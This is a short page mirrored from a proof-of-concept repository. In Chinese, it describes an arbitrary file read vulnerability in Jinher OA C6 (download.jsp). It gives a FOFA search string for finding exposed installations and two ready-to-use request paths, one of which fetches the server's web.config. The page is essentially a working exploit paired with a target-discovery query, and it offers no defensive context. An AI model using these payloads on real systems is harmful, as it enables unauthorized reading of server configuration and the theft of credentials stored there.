mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
476 B
476 B
金和OA-C6-download.jsp任意文件读取漏洞
金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息
fofa
app="Jinher-OA"
poc
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
